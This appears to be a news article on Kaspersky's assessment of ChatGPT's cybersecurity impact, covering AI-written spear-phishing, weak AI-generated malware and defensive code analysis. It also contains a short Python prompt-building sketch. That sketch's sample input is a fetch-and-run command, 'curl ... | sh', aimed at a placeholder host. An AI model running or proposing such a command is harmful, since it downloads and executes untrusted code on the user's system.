ChatGPT: Cybercriminals can use it as part of their scams

by time news

Kaspersky has analyzed how the expansion of ChatGPT, one of the most powerful Artificial Intelligence models to date, could change the established rules of cybersecurity. ChatGPT-3 can explain complex scientific concepts better than many teachers, write music, and produce almost any kind of text a user asks for.

ChatGPT-3 is an Artificial Intelligence system capable of generating text that is hard to distinguish from text written by a person. For this reason, cybercriminals can apply the technology to spear-phishing attacks: email scams and communications aimed at specific individuals, organizations, or companies. Writing personalized messages used to demand significant effort from cybercriminals, but with ChatGPT that is no longer the case: it can create persuasive, personalized phishing emails at scale. As a result, the number of successful attacks based on this Artificial Intelligence model is expected to grow.

As if that were not enough, ChatGPT is also capable of generating malicious computer code. Programming knowledge is no longer necessary to create malware, but this need not be a threat for anyone with a reliable security solution, since such solutions automatically detect and neutralize programs created by bots. Although some experts have expressed concern that ChatGPT could create malware tailored to each victim, the code will still exhibit malicious behavior that security solutions will almost always detect. Full automation of malware creation has not been achieved at this time.

With all this, ChatGPT can be an ally for attackers, but also for those who want to defend against this type of threat. It can quickly reveal the purpose for which a piece of code was created, something especially useful in Security Operations Centers (SOCs), where experts carry a heavy workload and any tool that speeds up analysis is welcome. In the future we will see reverse-engineering systems that help to better understand code, models for vulnerability research and CTF (Capture The Flag) challenge solving, and much more.
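As a rough illustration of that SOC use case, the hypothetical helper below wraps a suspicious code snippet in a prompt that an analyst could hand to a language model for a first-pass explanation. The function name and prompt wording are invented for this sketch, and no real model or API is called here; a production workflow would send the resulting prompt to whatever model the team uses.

```python
# Hypothetical sketch: packaging a suspicious snippet into a prompt for
# a language model, as a SOC analyst might do for a first-pass triage.
# Only the prompt text is built; no model or network call is made.

def build_analysis_prompt(snippet: str, context: str = "unknown origin") -> str:
    """Return a prompt asking a language model to describe what the
    given code does and to flag potentially malicious behavior."""
    return (
        "You are assisting a security analyst.\n"
        f"Context: sample of {context}.\n"
        "Explain, step by step, what the following code does and note "
        "any behavior that could be malicious (persistence, network "
        "exfiltration, obfuscation):\n\n"
        f"{snippet}"
    )

# Example: a snippet an analyst might pull from a suspicious attachment.
suspicious = "import os; os.system('curl http://example.invalid | sh')"
prompt = build_analysis_prompt(suspicious, context="an email attachment")
print(prompt.splitlines()[0])  # prints: You are assisting a security analyst.
```

The point of the wrapper is simply that the analyst's context (where the sample came from, what behaviors to look for) travels with the code, so the model's answer can be read as a triage aid rather than a verdict.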

“Although ChatGPT is not designed for criminal use, it can help cyber attackers, for example, to write credible and personalized phishing emails, although it is not capable of becoming a stand-alone hacking system. Furthermore, the malicious code it generates does not necessarily work correctly: a trained and dedicated human specialist is required to improve it. ChatGPT does not have an immediate impact on the industry and does not change the rules of cybersecurity, but the next generations of AI probably will. In the coming years, we will see how Artificial Intelligence models trained on both natural language and programming code are adapted to specific cybersecurity tasks. These changes could affect a wide range of industry activities, from threat hunting to incident response. Cybersecurity companies will explore the possibilities these new tools bring, while remaining aware of how the technology could help cybercriminals,” says Vladislav Tushkanov, security expert at Kaspersky.

